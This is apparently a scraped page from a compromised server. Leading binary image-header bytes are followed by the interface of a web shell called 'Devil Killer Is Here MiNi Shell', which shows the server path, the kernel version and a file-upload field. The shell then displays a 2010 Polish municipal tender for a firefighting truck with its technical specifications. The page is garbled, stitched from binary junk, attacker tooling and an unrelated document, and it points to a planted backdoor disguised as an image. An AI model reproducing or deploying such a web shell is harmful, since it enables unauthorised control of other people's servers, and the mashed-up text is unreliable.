JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100812/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100812/218197-N-2010.html

<p class="kh_header"><b>Polanica-Zdrój: Dostawa1 szt. średniego samochodu Ratowniczo - Gaśniczego GBA z napędem terenowym 4x4  dla Jednostki Ochotniczej Straży Pożarnej w Polanicy-Zdroju</b><br>
<b>Numer ogłoszenia: 218197 - 2010; data zamieszczenia: 12.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Polanica-Zdrój , ul. Dąbrowskiego 3, 57-320 Polanica-Zdrój, woj. dolnośląskie, tel. 074 8680600, faks 0-74 86 810 46.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polanica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa1 szt. średniego samochodu Ratowniczo - Gaśniczego GBA z napędem terenowym 4x4  dla Jednostki Ochotniczej Straży Pożarnej w Polanicy-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest dostawa  średniego samochodu Ratowniczo - Gaśniczego GBA z napędem terenowym 4x4  dla Jednostki Ochotniczej Straży Pożarnej w Polanicy-Zdroju o następujących parametrach i wyposażeniu ;
1.	 PODWOZIE Z KABINĄ.
1.1. Masa całkowita samochodu gotowego do akcji ratowniczo - gaśniczej (pojazd z załogą, pełnymi zbiornikami, zabudową i wyposażeniem) nie może przekroczyć 14.000 kg. Dopuszczalna masa całkowita podana w świadectwie homologacji może przekraczać 14.000kg.
1.2. Spełniające wymagania polskich przepisów o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych zgodnie z Ustawą  Prawo o ruchu drogowym.
1.3.	Pojazd musi być wyposażony w; 
1.3.1.	urządzenie sygnalizacyjno - ostrzegawcze, akustyczne i świetlne stroboskopowe. Belka świetlna - montowana na dachu kabiny Urządzenie akustyczne powinno umożliwiać podawanie komunikatów słownych oraz komunikatów za pomocą radiotelefonu.
1.3.2.	dodatkowy sygnał pneumatyczny o natężeniu min. 115dB włączany dodatkowym włącznikiem
1.3.3.	dodatkowe dwie lampy sygnalizacyjne niebieskie stroboskopowe z przodu pojazdu (na masce silnika) 
1.3.4.	lampa z tyłu pojazdu niebieska stroboskopowa. Lampa tylna zabezpieczona przed uszkodzeniem kloszy. Pojazd musi być wyposażony w wyłącznik, tylnych niebieskich lamp alarmowych w przypadku jazdy w kolumnie
1.3.5.	z przodu pojazd musi być wyposażony w dwa światła przeciwmgielne
1.4.	Podwozie samochodu fabrycznie nowe wyprodukowane w 2010 roku
1.5.	Podwozie samochodu z silnikiem z turbodoładowaniem o zapłonie samoczynnym spełniającym wymogi czystości spalin EURO - 5, o mocy minimum 210kW.  Osiągnięcie normy czystości spalin poprzez zastosowanie płynu AdBlue.
1.6.	Maksymalna wysokość całkowita pojazdu nie większa niż 3200 mm, maks. wysokość górnej krawędzi najwyższej półki w położeniu roboczym (po wysunięciu lub rozłożeniu) szuflady nie wyżej niż 1800mm od poziomu terenu. Jeżeli wysokość półki lub szuflady przekracza 1800mm od poziomu gruntu, konieczne jest zainstalowanie podestów umożliwiających łatwy dostęp do sprzętu. Otwarcie lub wysunięcie podestów musi być sygnalizowane w kabinie kierowcy. Otwierane lub wysuwane podesty muszą posiadać oznakowanie ostrzegawcze. Sprzęt powinien być rozmieszczony grupowo w zależności od przeznaczenia  z zachowaniem zasad ergonomii.
1.7.	Napęd  stały  4x4, możliwość blokady mechanizmu różnicowego i blokady międzymostowej.
1.8.	Układ hamulcowy jak dla pojazdów pożarniczych o ciś.10 bar , wyposażony w dwuobwodowe hamulce pneumatyczne oraz system ABS z możliwością odłączenia.
1.9.	Masowy wskaźnik mocy -określony dla masy pojazdu gotowego do akcji minimum 14kW/1000kg.
1.10.	Kabina czterodrzwiowa, jednomodułowa, zapewniająca dostęp do silnika, w układzie miejsc 1+1+4 (siedzenia przodem do kierunku jazdy), kabina wyposażona w: 
1.10.1.	-indywidualne oświetlenie nad siedzeniem dowódcy;
1.10.2.	-niezależny układ ogrzewania i wentylacji, umożliwiający ogrzewanie kabiny przy wyłączonym silniku;
1.10.3.	-reflektor ręczny (szperacz umieszczony wewnątrz kabiny) do oświetlania numerów budynków ;
1.10.4.	-reflektor pogorzeliskowy umieszczony z przodu pojazdu na zewnątrz kabiny  z możliwością podłączenia i zamocowania w tylnej części dachu pojazdu;
1.10.5.	-uchwyt poprzeczny dla załogi zamontowany za siedzeniami dowódcy i kierowcy; 
1.10.6.	-dwie skrytki - schowki na dokumenty oraz drobne przedmioty wyposażenia załogi;
1.10.7.	-natężenie oświetlenia wewnątrz kabiny mierzone na środku krawędzi zewnętrznej każdego siedziska (za wyjątkiem fotela kierowcy) nie powinno być mniejsze niż 30lx;
1.10.8.	- lusterka zewnętrzne podgrzewane
1.10.9.	-przeciwpyłkowy filtr powietrza do kabiny
1.10.10.	- klimatyzację manualną
1.10.11.	-wskaźnik temperatury zewnętrznej
1.10.12.	-elektrycznie regulowane lusterka kierowcy i pasażera
1.10.13.	-regulator położenia świateł.
1.11.	Fotele wyposażone w bezwładnościowe pasy bezpieczeństwa: 
1.11.1.	-siedzenia pokryte materiałem łatwym w utrzymaniu czystości, odpornym na rozdarcie i ścieranie;
1.11.2.	-wszystkie fotele wyposażone w zagłówki;
1.11.3.	fotel kierowcy z regulacją wysokości, odległości i pochylenia oparcia
1.12.	Instalacja elektryczna 24V. Moc alternatora min. 2200 W i pojemność akumulatorów min. 160Ah, musi zapewniać pełne zapotrzebowanie na energię elektryczną przy jej maksymalnym obciążeniu.
1.13.	Instalacja wyposażona w główny wyłącznik prądu, bez odłączania urządzeń wymagających stałego ładowania np. ładowarki latarek, ładowarki radiotelefonów i tachografu. Pojazd powinien posiadać urządzenie zabezpieczające akumulatory przed nadmiernym rozładowaniem uniemożliwiającym uruchomienie silnika pojazdu
1.14.	Pojazd wyposażony w wbudowany prostownik oraz złącze umożliwiające ładowanie akumulatorów z sieci 230V oraz umożliwiające samoczynne rozłączenie po uruchomieniu silnika pojazdu . Złącze umieszczone po lewej stronie nadwozia. Wymagana sygnalizacja podłączenia do sieci w kabinie kierowcy.
1.15.	W kabinie kierowcy zamontowany radiotelefon dopuszczony do stosowania w sieci PSP o parametrach nie gorszych niż; 
1.15.1.	- w zakresie częstotliwości VHF 136 - 174MHz, 
1.15.2.	- moc 1-25 W, 
1.15.3.	 -250 kanałowy
1.15.4.	 - odstęp miedzy kanałowy 12,5kHz 
1.15.5.	 - dodatkowy zewnętrzny głośnik w kabinie załogi oraz głośnik i manipulator w przedziale autopompy.
1.15.6.	W kabinie kierowcy zamocowane 3 ładowarki do radiotelefonów przenośnych typu GP-360 (radiotelefony dostarcza Zamawiający)
1.16.	Elektryczne urządzenia radiowe oraz akustyczno-sygnalizacyjne wykonane   w sposób nie powodujący zakłóceń podczas ich jednoczesnej pracy.
1.17.	Pojazd wyposażony w sygnalizację świetlną i dźwiękową (modulowaną) włączonego biegu wstecznego. Jako sygnalizację świetlną dopuszcza się światło cofania.
1.18.	Prześwit pod osiami min. 230mm .Należy podać konkretną wartość dla oferowanego podwozia.
1.19.	Kąt natarcia - nie mniejszy niż 23st. Należy podać konkretną wartość dla oferowanego pojazdu.
1.20.	Kąt zejścia nie mniejszy niż 23st Należy podać konkretną wartość dla oferowanego pojazdu.
1.21.	Kolorystyka:
1.21.1.	kolorystyka
1.21.2.	 elementy podwozia - czarne;
1.21.3.	 błotniki i zderzaki - białe; 
1.21.4.	kabina, zabudowa - RAL 3000; 
1.21.5.	pojazd oznakowany numerami operacyjnymi w kolorze białym wg wymagań zamawiającego.
1.22.	Największa obrysowa średnica zawracania 18 m.
1.23.	Maksymalna prędkość na najwyższym biegu nie mniej niż 90km/h
1.24.	Rezerwa masy w pełni obciążonego samochodu w stosunku do całkowitej dopuszczalnej masy pojazdu - min. 5%.
1.25.	Instalacja pneumatyczna pojazdu zapewniająca możliwość wyjazdu w ciągu max. 60 s, od chwili uruchomienia silnika samochodu, równocześnie musi być zapewnione prawidłowe funkcjonowanie hamulców
1.26.	Wylot spalin nie może być skierowany na stanowiska obsługi poszczególnych urządzeń pojazdu
1.27.	Wszelkie funkcje wszystkich układów i urządzeń pojazdu muszą zachować swoje właściwości pracy w temperaturach od -25 st.C do +50st.C.
1.28.	Podstawowa obsługa silnika możliwa bez podnoszenia kabiny.
1.29.	Pojemność zbiornika paliwa powinna zapewniać przejazd min. 300km lub 4 godz. pracę autopompy, jednak nie mniej niż 130 litrów.
1.30.	Silnik pojazdu powinien być przystosowany do ciągłej pracy w czasie min. 4 godz. podczas postoju, bez uzupełniania cieczy chłodzącej, oleju oraz bez przekraczania dopuszczalnych parametrów pracy (np. temperatury) określonych przez producenta. Skrzynia biegów pojazdu wyposażona w chłodnicę oleju
1.31.	Pojazd wyposażony w zaczep holowniczy wg PN-76/S-47291 i PN-86/S-48020 posiadający homologację lub znak bezpieczeństwa  z tyłu pojazdu, instalację elektryczną i pneumatyczną do holowania przyczepy oraz po dwa uchwyty szeklowe holownicze z przodu  i tyłu pojazdu
1.32.	Ogumienie specjalne, z bieżnikiem dostosowanym do różnych warunków terenowych i atmosferycznych
1.33.	Pojazd wyposażony w pełnowymiarowe koło zapasowe. Dopuszcza się brak mocowania koła na pojeździe
1.34.	Pojazd wyposażony w wyciągarkę linową napędzaną elektrycznie , długość liny min.25m. Maksymalny uciąg wyciągarki min.60kN
2.	ZABUDOWA POŻARNICZA;
2.1.	Konstrukcja (stelaż) zabudowy oraz pokrycie zewnętrzne wykonane z materiałów odpornych na korozję - stal nierdzewna, aluminium. Ściana zabudowy znajdująca się za kabiną kierowcy zabezpieczona przed uszkodzeniem przez kamienie wyrzucane spod kół pojazdu.
2.2.	Dach zabudowy w formie podestu roboczego w wykonaniu antypoślizgowym. Na dachu zamontowane uchwyty na sprzęt i armaturę nie powodujące przemieszczania sprzętu podczas jazdy, wykonane wg wymagań zamawiającego oraz wykonana z materiałów odpornych na korozję skrzynia na sprzęt o wymiarach 220x60x30cm z oświetleniem jej wnętrza. 
2.3.	Na podeście roboczym zamontowane działko wodno-pianowe o regulowanej wydajności 800-1600 1/min. przy ciśnieniu 0,8 MPa i regulowanym kształcie strumienia. Przy podstawie działka zamontowany zawór odcinający.
2.4.	Na tylnej ścianie nadwozia umieszczona składana drabinka umożliwiająca wejście na dach pojazdu. Ostatni szczebel przy wierzchołku drabinki wykonany w formie podestu ułatwiający wchodzenie i schodzenie z dachu pojazdu . Rozłożenie drabinki powinno być sygnalizowane w kabinie kierowcy oraz powodować załączanie oświetlenia dachu pojazdu.
2.5.	Skrytki na sprzęt i wyposażenie oraz przedział autopompy zamykane żaluzjami wodno i pyłoszczelnymi wspomaganymi systemem sprężynowym wykonane z materiałów odpornych na korozję, wyposażone w rurowe uchwyty oraz zamki zamykane na klucz, jeden klucz powinien pasować do wszystkich zamków, skrytek. Wewnątrz skrytek zamocowane półki umożliwiające ich regulację w zależności od indywidualnych potrzeb użytkownika
2.6.	Skrytki na sprzęt i przedział autopompy muszą być wyposażone w oświetlenie typu LED włączane automatycznie po otwarciu żaluzji skrytki, w kabinie wymagana sygnalizacja otwarcia skrytki, główny wyłącznik oświetlenia skrytek powinien być zainstalowany w kabinie kierowcy, poszczególne skrytki powinny posiadać spis jaki rodzaj sprzętu w nich się znajduje. Dopuszcza się stosowanie piktogramów.
2.7.	Pojazd powinien posiadać oświetlenie pola pracy wokół samochodu zapewniające oświetlenie min. 5 luksów w odległości /zgodnie z wymaganiami/ 1 m w warunkach słabej widoczności.
2.8.	Szuflady i wysuwane tace muszą się automatycznie blokować w pozycji zamkniętej i posiadać zabezpieczenie przed całkowitym wyciągnięciem (wypadnięciem z prowadnic).
2.9.	Szuflady i tace wystające w pozycji otwartej powyżej 250 mm poza obrys pojazdu muszą posiadać oznakowanie ostrzegawcze.
2.10.	Uchwyty, klamki wszystkich urządzeń samochodu, drzwi żaluzjowych, szuflad, podestów, tac, muszą być tak skonstruowane, aby umożliwiały ich obsługę w rękawicach.
2.11.	Konstrukcja skrytek zapewniająca odprowadzenie wody z ich wnętrza i skuteczną wentylację, szczególnie tych w których przewidziane będą urządzenia z napędem silnikowym i paliwem
2.12.	Powierzchnie platform, podestu roboczego i podłogi kabiny w wykonaniu antypoślizgowym
2.13.	Zbiornik wody o pojemności min. 2,5 m3, wykonany z tworzywa sztucznego odpornego na korozję. Zbiornik musi być wyposażony w oprzyrządowanie umożliwiające jego bezpieczną eksploatację,  z układem zabezpieczającym przed przelaniem. Zbiornik powinien posiadać właz rewizyjny oraz dolny otwór zamykany zaślepką o średnicy nie mniejszej niż 75 mm do usuwania zanieczyszczeń ze zbiornika.
2.14.	Zbiornik środka pianotwórczego o pojemności min 10% pojemności zbiornika wody - wykonany z tworzywa sztucznego odpornego na działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów, -zbiornik musi być wyposażony w oprzyrządowanie zapewniające jego bezpieczną eksploatację, -napełnianie zbiornika środkiem pianotwórczym powinno być możliwe  z poziomu terenu i z dachu pojazdu.
2.15.	Autopompa zlokalizowana z tyłu pojazdu w obudowanym przedziale zamykanym żaluzją. Przedział autopompy ogrzewany niezależnym ogrzewaniem tego samego producenta jak urządzenie w kabinie.
2.16.	Autopompa dwuzakresowa z jednym stopniem niskiego i z jednym stopniem wysokiego ciśnienia. Wydajność autopompy nie mniejsza niż 2400 dm3/min przy ciśnieniu 8 bar  i głębokości ssania 1,5 m oraz wydajności nie mniejszej niż  400 dm3/min przy ciśnieniu min. 4,0MPa. Napęd autopompy, wałem napędowym bezpośrednio z przystawki odbioru mocy podwozia samochodu bez stosowania dodatkowej przekładni zwiększającej lub zmniejszającej obroty pompy. 
2.17.	Układ wodno - pianowy zabudowany w taki sposób, aby parametry autopompy przy zasilaniu ze zbiornika samochodu były nie mniejsze niż przy zasilaniu ze zbiornika zewnętrznego dla głębokości ssania l,5m
2.18.	Samochód musi być wyposażony w co najmniej 1 wysokociśnieniową linię szybkiego natarcia o długości węża min. 60m na zwijadle, zakończoną prądownicą wodno-pianową o regulowanej wydajności z prądem zwartym i rozproszonym.
2.19.	Linia szybkiego natarcia musi umożliwiać podawanie wody lub piany bez względu na stopień rozwinięcia węża. Linia zakończona prądownicą wodno- pianową uniwersalną typu TURBOJET o ciśnieniu roboczym od 0,35 do 4,0 MPa o płynnie regulowanym przepływie w zakresie od 50 do 230 l/min, umożliwiającą podanie prądu zwartego o długości rzutu nie mniejszym niż 35m . Prądownica wyposażona w nasadkę do podawania piany ciężkiej. Do zwijania węża należy zastosować urządzenie o napędzie elektrycznym. Urządzenie to powinno być uruchamiane z panelu sterowania autopompą i dodatkowym wyłącznikiem nożnym. Urządzenie wyposażone w sprzęgło przeciążeniowe. Zwijadło wyposażone w regulowany hamulec bębna, i korbę umożliwiającą awaryjne zwijanie węża.
2.20.	Autopompa musi umożliwiać podanie wody i wodnego roztworu środka pianotwórczego do min.; 
2.20.1.	- dwóch nasad tłoczonych 75 zlokalizowanych z tyłu pojazdu; 
2.20.2.	- wysokociśnieniowej linii szybkiego natarcia; 
2.20.3.	- działka wodno-pianowego na dachu pojazdu. 
2.20.4.	- zbiornika samochodu.
2.21.	Autopompa musi być wyposażona w urządzenie odpowietrzające umożliwiające zassanie wody: z głębokości 1,5m w czasie do 30s, z głębokości 7,5m w czasie do 60s.
2.22.	Autopompa musi umożliwiać podawanie wody lub piany podczas poruszania się pojazdu.
2.23.	Podwozie samochodu musi być wyposażone w urządzenie zdalnego sterowania sprzęgłem umożliwiające załączanie i wyłączanie przystawki napędu autopompy z pulpitu obsługi autopompy.
2.24.	W przedziale autopompy muszą znajdować się co najmniej następujące urządzenia kontrolno-sterownicze pracy pompy:  
2.24.1.	 manowakuometr,    
2.24.2.	 manometr niskiego ciśnienia,   
2.24.3.	 manometr wysokiego ciśnienia,    
2.24.4.	 wskaźnik poziomu wody w zbiorniku samochodu,    
2.24.5.	 wskaźnik poziomu środka pianotwórczego w zbiorniku,     
2.24.6.	 regulator prędkości obrotowej silnika pojazdu,    
2.24.7.	 miernik prędkości obrotowej wału autopompy,     
2.24.8.	 włącznik i wyłącznik pracy silnika pojazdu,     
2.24.9.	 kontrolka temperatury cieczy chłodzącej silnika,    
2.24.10.	schemat układu wodno-pianowego
2.25.	W kabinie kierowcy powinny znajdować się następujące urządzenia kontrolno pomiarowe: 
2.25.1.	 manometr niskiego ciśnienia;
2.25.2.	 wskaźnik poziomu wody w zbiorniku samochodu;
2.25.3.	 wskaźnik poziomu środka pianotwórczego w zbiorniku samochodu; 
2.25.4.	 licznik motogodzin pracy autopompy.
2.25.5.	 wskaźnik stopnia naładowania akumulatorów
2.25.6.	uruchomienie silnika pojazdu z przedziału autopompy powinno być możliwe tylko dla neutralnego położenia dźwigni zmiany biegów oraz po włączeniu hamulca pomocniczego.
2.26.	Zbiornik wody musi być wyposażony w nasadę 75 z zaworem do napełniania z hydrantu (wlot do napełniania powinien mieć konstrukcję zabezpieczającą przed swobodnym wypływem wody ze zbiornika tym wylotem oraz przedostawaniem się zanieczyszczeń do zbiornika samochodu), automatyczny zawór zabezpieczający przed przepełnieniem zbiornika z możliwością przełączenia na prace ręczną. Praca automatycznego dopełniania zbiornika w zakresie 25-75% napełnienia.
2.27.	Autopompa musi być wyposażona w dozownik środka pianotwórczego zapewniający uzyskiwanie minimum stężeń 3% zgodnie z wymaganiami i 6 % ( tolerancja +-0,5%) w całym zakresie wydajności pompy.
2.28.	Autopompa musi być wyposażona w automatyczny układ utrzymywania stałego ciśnienia tłoczenia.
2.29.	Wszystkie elementy układu wodno - pianowego muszą być odporne na korozję  i działanie dopuszczonych do stosowania środków pianotwórczych  i modyfikatorów.
2.30.	Konstrukcja układu wodno-pianowego powinna umożliwić jego całkowite odwodnienie.
2.31.	Przedział autopompy musi być wyposażony w system ogrzewania tego samego producenta jak urządzenie w kabinie kierowcy, skutecznie zabezpieczający układ wodno-pianowy przed zamarzaniem w temperaturze do -25 st.C oraz skuteczne odwadnianie.
2.32.	Na wlocie ssawnym autopompy musi być zamontowany filtr zabezpieczający przed przedostaniem się do pompy zanieczyszczeń stałych zarówno przy ssaniu ze zbiornika zewnętrznego jak i zbiornika własnego pojazdu, gwarantujący bezpieczną eksploatację pompy.
2.33.	W zabudowie pożarniczej pojazdu należy  zamontować wysuwane stelaże do przewożenia 6 aparatów powietrznych jednobutlowych i pięciu butli zapasowych (stalowych). Aparaty zamocowane na stelażu umożliwiającym samodzielne zakładanie ich przez członków załogi bez zdejmowania ze stelaża.
2.34.	W kabinie załogi pojazdu umieszczenie i zamocowanie 5 szt. ładowarek z ręcznymi latarkami elektrycznymi w wykonaniu EX.
W ofercie należy zamieścić informację dotyczącą bilansu masowego pojazdu  z wyszczególnieniem na:
*	masę całkowitą pojazdu z załogą, pełnymi zbiornikami i wyposażeniem,
*	masę własną pojazdu,
*	masę wyposażenia,
*	obciążenie strony lewej i prawej pojazdu (dopuszczalna różnica w obciążeniu strony lewej i prawej nie może przekraczać 3%).
Podwozie pojazdu powinno posiadać świadectwo homologacji wydane przez Ministra Infrastruktury oraz aktualne świadectwo dopuszczenia wydane przez CNBOP na cały pojazd po jego zabudowie zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007r.;  w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczania tych wyrobów do użytkowania  (Dz.U. nr 143 poz. 1002 z 2007r. z późn. zmianami) . Wymienione wyżej dokumenty należy dostarczyć zamawiającemu w dniu odbioru samochodu.
3.	POJAZD NALEŻY WYPOSAŻYĆ  I WYKONAĆ ZAMOCOWANIE NASTĘPUJĄCEGO SPRZĘTU;
Wyposażenie i uzbrojenie osobiste strażaka.
Węże, armatura i osprzęt.
3.1.	Węże tłoczne W-52-20-ŁA	 			                       10 szt.
3.2.	Węże tłoczne W-75-20-LA					          10 szt.
3.3.	Wąż tłoczny W-75 [5 m]							2 szt.
3.4.	Noszak do węży							1 szt.
3.5.	Podpinki wężowe 							4 szt.
3.6.	Siodełko wężowe 							2 szt.
3.7.	Prądownica wodna 52 TURBOJET musi zapewnić 			2 szt.
3.7.1.	zasilanie Storz 52 mm, na łożysku obrotowym,
3.7.2.	uchwyt pistoletowy,
3.7.3.	zakres wydajności 115 - 475 l/min
3.7.4.	strumień zwarty i rozproszony (płynna regulacja),
3.7.5.	zasięg maksymalny min. 47 m,
3.7.6.	współpraca z nasadą pianową do piany ciężkiej
3.7.7.	współpraca z nasadą pianową do piany średniej
3.7.8.	funkcja przepłukiwania prądownicy podczas pracy
3.7.9.	możliwość przepływu zanieczyszczeń stały o średnicy do 6 mm.
3.7.10.	sprzęt musi znosić wielokrotny upadek z wysokości min. 2m na beton.

3.8.	Prądownica wodna 75 TURBOJET musi zapewniać: 			2 szt.
3.8.1.	 zasilanie typu Storz 75 mm, na łożysku obrotowym
3.8.2.	zakres wydajności - 115 - 750 m/min,
3.8.3.	strumień zwarty i rozproszony (płynna regulacja)
3.8.4.	zasięg maksymalny min. 58 m,
3.8.5.	uchwyt pistoletowy,
3.8.6.	współpraca z nasadą pianową do piany ciężkiej
3.8.7.	współpraca z nasadą pianową do piany średniej
3.8.8.	funkcja przepłukiwania prądownicy podczas pracy
3.8.9.	możliwość przepływu zanieczyszczeń stały o średnicy do 6 mm
3.8.10.	sprzęt musi znosić wielokrotny upadek z wysokości min. 2m na beton.
3.9.	nasada pianowa do piany ciężkiej (współczynnik spienienia 12:1) 
	współpracująca z prądownicą wodną 52 TURBOJET	          szt. 2
3.10.	nasada pianowa do piany ciężkiej (współczynnik spienienia 12:1) 
	współpracująca z prądownicą wodną 75 TURBOJET	          szt. 2
3.11.	nasada pianowa do piany średniej (współczynnik spienienia 50:1) 
	współpracująca z prądownicą wodną 75 TURBOJET	          szt. 2
3.12.	 nasada pianowa do piany średniej (współczynnik spienienia 50:1) 
	współpracująca z prądownicą wodną 52 TURBOJET	          szt. 2
3.13.	Prądownica wodna z zaworem kulowym                                                 szt. 1
3.14.	Przełącznik 110/75						           1 szt.
3.15.	Przełącznik 75/52						           4 szt.
3.16.	Rozdzielacz kulowy 75/52-75-52		                                     2 szt.
Sprzęt ratowniczy.
3.17.	Drabina dwuprzęsłowa wysuwana (typu D10W)			            1 kpl.
3.18.	Pilarka do drewna o napędzie spalinowym;		                         1 kpl.
* ciężar bez prowadnicy piły łańcuchowej max. 	4,5 kg.
* moc min. 						1,0kW
* stosunek ciężaru do mocy min. 			3,0 kg/kW
* pojemność skokowa min. 				30,0 cm3
* maksymalna długość prowadnicy 			35 cm
3.19.	Przecinarka do stali i betonu o napędzie spalinowym z tarczami
różnych typów (betonu, stali)						1 kpl.
* ciężar bez tarczy tnącej max. 				10 kg.
* moc min. 						3,2 kW
* pojemność skokowa min. 				64,0 cm3
* minimalna średnica tarczy tnącej 			300 mm.
3.20.	Motopompa pływająca o parametrach nie gorszych niż:
3.20.1.	wydajność nie mniejsza nią 	       1200 l/min
3.20.2.	nasada tłoczna Storz			75 mm
3.20.3.	zanurzenie nie większe niż 		70 mm
3.20.4.	silnik benzynowy 4 suwowy o mocy  nie mniejszej niż 5,5 KM
